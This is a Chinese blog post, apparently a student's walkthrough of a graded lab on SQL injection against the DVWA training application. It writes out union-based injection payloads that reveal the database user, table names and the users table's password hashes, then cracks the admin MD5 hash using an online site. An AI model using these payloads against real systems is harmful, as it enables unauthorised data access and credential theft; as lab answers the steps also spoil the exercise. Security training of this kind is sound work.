【实训04】数据库SQL注入漏洞

最新推荐文章于 2024-04-27 17:37:33 发布
最新推荐文章于 2024-04-27 17:37:33 发布
阅读量1.7k 收藏 2
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62277763/article/details/127374025
版权

 

第1关:获取dvwa环境

下载dvwa的时候其实已经通过了,但建议全部做一下,后面的要用

git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

第2关:获取数据库名称、账户名、版本及操作系统信息

注入的sql:

1' union select user(),database()#

使用sql注入查询数据库用户名和数据库名,并将用户名和数据库名写入/data/workspace/myshixun/result2中:

root@localhost dvwa

第3关:获取数据库表名、列名 

注入的sql语句:

1' UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#

使用sql注入查询dvwa数据库的所有表名,并将所有表明写入/data/workspace/myshixun/result3中:

guestbook users

第4关:获取用户名密码,并猜测root用户

注入的sql语句:

1' union select user,password from users#

在出现的下列表中找到admin

 找到

5f4dcc3b5aa765d61d8327deb882cf99

在进行解密,我推荐一个解密的在线网站https://md5.cn/

 解密成功的

password

 

LyCaN1
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
DB2数据库SQL注入手册1
08-08
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制数据库。 在本手册中,我们将介绍如何在DB2数据库中进行SQL注入攻击的检测和防止。同时,我们还将提供一些实用...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
SQL注入漏洞——sql盲注
xiaoheizi的博客
06-12 400
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database()名的长度
网络安全-Mysql注入知识点_length(database())
2401_84300128的博客
04-27 993
sql语句查询结果。
pikachu如何利用字符型SQL注入拿下数据库
m0_61903602的博客
10-30 843
pikachu如何利用字符型SQL注入拿下数据库
【无标题】SQL注入——MYSQL
m0_48222671的博客
04-21 2819
MYSQL注入一、SQL注入产生的条件二、判断注入点三、注入步骤1.猜解列名数量2.报错猜解3.查看当前数据库4.查看数据库名5.查看数据库表名6.查询admin列名7.查询user中的username 一、SQL注入产生的条件 可控变量 参数带入数据库查询 变量未经过过滤或过滤不严谨 二、判断注入点 下面的方法也知识可能存在,如果有404或者跳转,则没有注入 id=1 and 1=1 页面正常 id=1 and 1=1 页面错误 三、注入步骤 以判断存在注入 1.猜解列名数量 id=1 ord
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 5920
渗透测试-SQL注入之核心语法获取数据库信息
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 5405
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
实训指导数据库漏洞攻击SQL综合利用工具的使用(共15张PPT).pptx
11-14
实训指导数据库漏洞攻击SQL综合利用工具的使用(共15张PPT).pptx
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
MySQLMTOP数据库监控系统.zip SQL注入漏洞发现及修补技术.zip
数据库SQL实训设计报告图书管理系统.doc
11-24
"数据库SQL实训设计报告图书管理系统" 以下是根据给定的文件信息生成的相关知识点: 一、 数据库概念模型 E-R 图 * 实体关系图(E-R 图)是描述实体之间的关系的图形表示方法。 * 在图书管理系统中,实体包括用户...
SQL注入之获取数据库用户表数据
qq_59099375的博客
03-18 1233
SQL注入获取数据库数据
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1841
union注入详细教程
SQL注入讲课准备
weixin_62420492的博客
01-15 536
一.基本函数
sql注入-02mysql注入
weixin_44576725的博客
11-07 1191
mysql注入 1、用户权限查询数据库分类 root用户:最高权限用户,可以查看所有数据库,可跨库查询、注入 普通用户:仅可查询当前自己所属的数据库 2、跨库注入 利用information_schema表特性,记录库名、表名、列名对应表,常常结合where table_name = ‘表名’ and table_schema = ‘数据库名’、from mysql.admin类似这样的限制条件。 3、文件读写操作 3.1函数(mysql独有) load_file():读取函数 mysql> se
SQL注入(查询注入)
m0_61974571的博客
10-12 1716
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
Spark SQL自定义函数
m0_52680439的博客
11-12 167
用户在自定义聚合函数时,须要继承 Aggregator抽象类,还必须重写这个类中的zero、reduce、merge、finish、bufferEncoder、outputEncoder 这几个函数。Aggregator 中的类型介绍:IN : 聚合的输入类型BUF : 减少的中间值的输入类型OUT : 最终输出结果的类型对于 Aggregator 类中重写这几个函数的介绍如下所示:zero : BUF 聚合的中间结果的初始值。
实训01】基于视图的访问控制
一只鼠标的博客
09-26 3844
第1关:基于视图的简单查询;第2关:可见列控制;第3关:加密视图与更新视图
达梦数据库sql注入
10-20
达梦数据库也存在SQL注入漏洞,如果使用该类数据库的站点存在SQL注入漏洞,用SQLmap等工具无法支持我们直接得到想要的数据,我们需要理解这些数据库的语法才能更好的进行手工注入。以下是一些达梦数据库的手工注入技巧: 1.注入点的判断:可以通过单引号、双引号、括号等特殊字符来判断是否存在注入点。 2.注入语句的构造:可以通过union、select、from等语句来构造注入语句。 3.获取数据库信息:可以通过查询系统表或者使用一些特殊函数来获取数据库的信息。 4.获取数据:可以通过查询表或者使用一些特殊函数来获取数据。 总之,达梦数据库SQL注入和其他数据库的注入类似,需要理解其语法和特点,才能更好地进行手工注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值